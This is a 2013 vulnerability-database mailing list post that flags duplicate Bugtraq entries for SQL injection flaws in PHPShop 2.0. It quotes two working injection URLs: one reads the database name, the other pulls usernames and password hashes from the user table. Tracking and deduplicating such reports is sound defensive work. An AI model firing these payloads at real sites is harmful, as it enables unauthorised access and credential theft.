[VIM] PHPShop CMS Multiple SQL Injection Vulnerabilities
George A. Theall
theall at tenable.com
Wed Jan 16 06:43:10 CST 2013
BID 57320 was created yesterday for the SQL injections reported in EDB-ID 24108:
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
These are among the issues reported in http://archives.neohapsis.com/archives/bugtraq/2009-12/0099.html and covered already by BID 37227
And the shop/flypage one was also reported earlier in http://archives.neohapsis.com/archives/bugtraq/2008-02/0014.html and is covered by BID 27570
Rob / Venkat?
George
--
theall at tenable.com
More information about the VIM
mailing list